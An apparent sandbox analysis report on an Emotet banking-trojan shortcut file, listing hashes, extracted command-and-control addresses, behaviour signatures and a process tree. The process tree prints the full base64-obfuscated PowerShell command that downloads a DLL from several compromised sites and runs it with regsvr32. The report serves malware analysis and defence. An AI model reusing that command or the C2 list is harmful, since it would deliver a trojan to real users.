emotet | 3e3b827cf8b350d18fc92feb1c7bafd89ca2239eb903bef27bdc06a41de98b57

Resubmissions

06/09/2022, 13:38

220906-qxnn7adff7 10

14/06/2022, 07:29

220614-jbbdeacfdk 10

13/06/2022, 22:26

220613-2cyjfafdb8 10

13/06/2022, 20:59

220613-zstjbaagap 10

Analysis

max time kernel
69s
max time network
69s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
06/09/2022, 13:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

UU3444499999999AA.lnk
Size

3KB
MD5

08205fbc8d439bb4dbded1b3b4146daa
SHA1

f07b89b0bb7691406f109e6be7d59551efa91fc7
SHA256

3e3b827cf8b350d18fc92feb1c7bafd89ca2239eb903bef27bdc06a41de98b57
SHA512

c1045c4ab9ce5e3fe0b2c13521b75e824b1501c626782aad55a20923d88ecdc9c0f28fd0b6f005dc5ea69b8af50bd7bb5963f389da55a4e7fc74fa8defbbc902

Score

10^/10

emotet epoch4 banker trojan

Malware Config

Extracted

Family

emotet

Botnet

Epoch4

149.56.131.28:8080

72.15.201.15:8080

207.148.79.14:8080

82.165.152.127:8080

46.55.222.11:443

213.241.20.155:443

163.44.196.120:8080

51.254.140.238:7080

107.170.39.149:8080

188.44.20.25:443

82.223.21.224:8080

172.104.251.154:8080

164.68.99.3:8080

101.50.0.91:8080

129.232.188.93:443

173.212.193.249:8080

103.132.242.26:8080

186.194.240.217:443

37.187.115.122:8080

91.207.28.33:8080

eck1.plain

ecs1.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet

Blocklisted process makes network request 3 IoCs

flow	pid	Process
14	1672	powershell.exe
28	1672	powershell.exe
30	1672	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	cmd.exe

Loads dropped DLL 2 IoCs

pid	Process
4292	regsvr32.exe
2244	regsvr32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4520	4364	WerFault.exe	91

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
1672	powershell.exe
1672	powershell.exe
4292	regsvr32.exe
4292	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1672	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2408 wrote to memory of 1672	2408	cmd.exe	81
PID 2408 wrote to memory of 1672	2408	cmd.exe	81
PID 1672 wrote to memory of 4292	1672	powershell.exe	86
PID 1672 wrote to memory of 4292	1672	powershell.exe	86
PID 4292 wrote to memory of 2244	4292	regsvr32.exe	87
PID 4292 wrote to memory of 2244	4292	regsvr32.exe	87

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\UU3444499999999AA.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2408
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "&{'/ZIIDxaZ4eOrVrXwvO7wSOLQe/f4UxLlrO9bmR5Uq4eReEdw+a2fZRMSDRMsW+yRtA38AWvk';$Hkc='JlbmNlPSJTaWxlbnRseUNvbnRpbnVlIjskbGlua3M9KCJodHRwOi8vbmljb2xhc3Nwb3J0YWZvbGlvLmF0d2VicGFnZXMuY29tL2Nzcy94S0FLYXpDVE4vIiwiaHR0cDovL3d3dy5haGFuLm9yZy5way9jYXRhbG9ndWVzL3YzLyIsImh0dHA6Ly9ucmMtc29sdWNpb25lcy5jb20uYXIvY2dpLWJpbi9uOWIwQTlOM0pScks2TXkvIiwiaHR0cDovL3d3dy5hZ3JldHRvLmNvbS9UZW1wbGF0ZS9qRURZQ1ltOG50SnQwU3EvIiwiaHR0cHM6Ly9teWFubWFyY2hlZnMuY29tL3dwLWNvbnRlbnQvS3VHNFc3aC8iLCJodHRwOi8vd29vbGxvb21vb2xvby5ubC9jZ2ktYmluL3pJZHdOQzJkLyIpOyR0PSJlblBNTXZSbiI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxLS0h3RUx3Y29YLnJLVTtSZWdzdnIzMi5leGUgIiRkXEtLSHdFTHdjb1gucktVIjticmVha30gY2F0Y2ggeyB9fQ==';$ZYCJ='IFdyaXRlLUhvc3QgInNBYlZTIjskUHJvZ3Jlc3NQcmVmZX';$ZYCJ=$ZYCJ+$Hkc;$EL=$ZYCJ;$gFtY=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($EL));$EL=$gFtY;iex($EL)}"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1672
- - C:\Windows\system32\regsvr32.exe
    "C:\Windows\system32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\..\enPMMvRn\KKHwELwcoX.rKU
    3⤵
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4292
  - - C:\Windows\system32\regsvr32.exe
      C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PYzEinSr\VvAIFB.dll"
      4⤵
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:2244

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 472 -p 4364 -ip 4364
1⤵
PID:2336

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4364 -s 2088
1⤵
- Program crash
PID:4520

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\enPMMvRn\KKHwELwcoX.rKU

Filesize
459KB

MD5
0d28db32173360fb7b8b8c08da02b35d

SHA1
0957c5de827f9fb80c8e09dbc3f7c01db6e67b5d

SHA256
ffc17488758f99d5a6c240aebc29a8731dc600e05a00552952e691a5d6ddf130

SHA512
66c084f1d849ff6be89e296a05f069590863e1a2505736eb51d55719c745f5a637e063b7e112b5c4c80affb3dbf31ec176da7b3a7421e311d083d708b30aa1b6

Download Submit
C:\Users\Admin\AppData\Local\enPMMvRn\KKHwELwcoX.rKU

Filesize
459KB

MD5
0d28db32173360fb7b8b8c08da02b35d

SHA1
0957c5de827f9fb80c8e09dbc3f7c01db6e67b5d

SHA256
ffc17488758f99d5a6c240aebc29a8731dc600e05a00552952e691a5d6ddf130

SHA512
66c084f1d849ff6be89e296a05f069590863e1a2505736eb51d55719c745f5a637e063b7e112b5c4c80affb3dbf31ec176da7b3a7421e311d083d708b30aa1b6

Download Submit
C:\Windows\System32\PYzEinSr\VvAIFB.dll

Filesize
459KB

MD5
0d28db32173360fb7b8b8c08da02b35d

SHA1
0957c5de827f9fb80c8e09dbc3f7c01db6e67b5d

SHA256
ffc17488758f99d5a6c240aebc29a8731dc600e05a00552952e691a5d6ddf130

SHA512
66c084f1d849ff6be89e296a05f069590863e1a2505736eb51d55719c745f5a637e063b7e112b5c4c80affb3dbf31ec176da7b3a7421e311d083d708b30aa1b6

Download Submit
memory/1672-133-0x00000125B95E0000-0x00000125B9602000-memory.dmp

Filesize
136KB

Download
memory/1672-134-0x00007FFC47860000-0x00007FFC48321000-memory.dmp

Filesize
10.8MB

Download
memory/1672-135-0x00000125BA200000-0x00000125BA9A6000-memory.dmp

Filesize
7.6MB

Download
memory/1672-142-0x00007FFC47860000-0x00007FFC48321000-memory.dmp

Filesize
10.8MB

Download
memory/4292-139-0x0000000180000000-0x000000018002A000-memory.dmp

Filesize
168KB

Download